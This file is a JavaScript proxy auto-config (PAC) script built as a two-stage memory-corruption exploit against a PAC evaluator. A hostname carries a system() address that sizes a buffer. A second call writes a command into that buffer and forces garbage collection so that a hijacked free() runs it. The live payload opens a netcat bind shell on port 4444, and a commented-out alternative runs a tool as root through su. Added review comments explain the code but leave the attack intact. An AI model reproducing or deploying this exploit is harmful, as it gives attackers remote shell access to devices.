// Payload string that stage2 of FindProxyForURL copies into the buffer
// created by stage1 (see strToBuf). Declared with `var` at top level, so in
// a classic script it presumably becomes a property of the global object --
// which is how FindProxyForURL reaches it on a later call (verify for the
// evaluator in use). The two commented-out lines are alternative payloads
// kept for reference; the second one, as written, is also missing its `=`.
//var command = "log \"exploit user: $(id)\"\n";
var command = "toybox nc -p 4444 -l /bin/sh"; // shell listens on port 4444
//var command "su -c /data/data/com.termux/files/usr/bin/r2 rap://:4444"; // r2 listens on port 4444
/**
 * PAC entry point (invoked by the evaluator for each URL) that also drives
 * the two-stage proof of concept described by the inline comments. The
 * requested host is the only input and is treated here as untrusted: a host
 * containing "stage1" carries a hex address after its first "-", and a host
 * containing "stage2" performs the write into the buffer stage1 set up.
 * Always returns "DIRECT", so no proxy is ever selected.
 * NOTE(review): alert() is not a standard PAC helper; presumably the
 * evaluator under test exposes it -- confirm, otherwise these calls throw.
 */
function FindProxyForURL(url, host){
alert(url);
alert(host);
// split into stages makes exploit easier / more reliable though it is not strictly necessary
if(host.includes("stage1")){
// No check that host contains a "-": split()[1] is then undefined, parseInt
// yields NaN, and new ArrayBuffer(NaN) silently allocates a zero-length buffer.
// includes() is a substring match, so any host with "stage1" in it takes this branch.
var system_addr = parseInt(host.split("-")[1], 16); // get system() addr from hostname
// Kept on `this` (presumably the global object in the PAC evaluator -- verify)
// so the buffer and its view survive until the separate "stage2" invocation.
this.x = new ArrayBuffer(system_addr); // set it as size to be used in blr x2 instruction later
this.v = new DataView(this.x); // dataview of buffer lets us write mem into [x0]
}
else if(host.includes("stage2")){
// Assumes stage1 already ran in an earlier call; otherwise this.v is undefined
// and strToBuf throws a TypeError on its first setUint8.
strToBuf(command, this.v); // write command into the memory of previous url
this.x = null; // remove refs
this.v = null; // remove refs
gc(); // trigger garbage collection to call overwritten free()
}
alert("done");
return "DIRECT";
}
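/**
 * Copies the low byte of each UTF-16 code unit of `str` into `buf`, starting
 * at offset 0, then writes a single 0 byte one past the copied text. The
 * terminator goes to offset str.length + 1 and offset str.length is left
 * untouched, exactly as the original did; that quirk is preserved here.
 * DataView throws a RangeError if `buf` is too small for either write.
 * @param {string} str - text to copy (code units above 0xFF are truncated by setUint8)
 * @param {DataView} buf - destination view; written in place
 * @returns {undefined}
 */
function strToBuf(str, buf)
{
  // `let` keeps the index local; the original assigned an implicit global `i`.
  for (let i = 0; i < str.length; i++)
  {
    buf.setUint8(i, str.charCodeAt(i));
  }
  // Same offset as the original's post-loop `i + 1`, spelled without the global.
  buf.setUint8(str.length + 1, 0);
}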
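/**
 * Allocation-pressure loop used in place of a real collector hook: creates
 * 1000 short-lived arrays of 0x1000 elements and discards them, returning
 * nothing. Whether this actually provokes a collection depends on the engine
 * and its heap state; the caller's comment in FindProxyForURL says it is
 * meant to trigger the overwritten free(). The allocation count and size are
 * kept identical to the original so the heap behaviour is unchanged.
 * @returns {undefined}
 */
function gc()
{
  // `let` keeps the index local; the original assigned an implicit global `i`.
  for (let i = 0; i < 1000; i++)
  {
    new Array(0x1000);
  }
}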